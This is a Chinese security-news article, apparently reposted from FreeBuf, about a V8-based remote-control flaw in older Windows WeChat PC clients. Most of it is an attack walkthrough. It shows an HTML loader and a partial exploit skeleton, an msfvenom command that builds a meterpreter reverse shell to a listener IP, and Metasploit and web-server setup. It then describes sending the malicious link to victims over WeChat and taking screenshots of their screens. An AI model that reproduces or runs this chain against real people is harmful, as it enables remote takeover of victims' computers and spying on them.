高危微信漏洞,点击链接可被黑客完全控制
2021-04-22 22:18:21 Author: www.freebuf.com(查看原文) 阅读量:82 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

根据腾讯安全中心的公告,这是因为chrome浏览器使用的V8引擎存在安全问题导致的。该漏洞仅影响windows版本的PC版微信,且只影响3.2.1.141以下版本。
u=2869398199,1478601235&fm=11&gp=0.jpg
1、漏洞利用的html,通过html调用JavaScript

<script src = "wa.js"></script>

2、wa.js 这里就不展示恶意部分了

ENABLE_LOG = true;
IN_WORKER = true;
var shellcode = [ ]
·
·
·
try{
    print("start running");
    trigger();
}catch(e){
    print(e);
}

3、使用Kali自带的msfvenom生成反弹木马,并将生成十六进制添加到上面代码的shellcode中

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.65 lport=9999 -f csharp

1.PNG
4、再使用metersploit监听端口,设置本地ip和本地监听端口
2.PNG
5、再使用python开发web服务器
3.PNG
6、将恶意链接发送到微信,并用微信点击打开
4.PNG
7、此时受害者就已经中招了,可以使用screenshot命令获取受害者PC当前画面的截图,可以想做什么就做什么了
5.PNG

u=1301411739,844423148&fm=26&gp=0.jpg


文章来源: https://www.freebuf.com/vuls/270497.html
如有侵权请联系:admin#unsafe.sh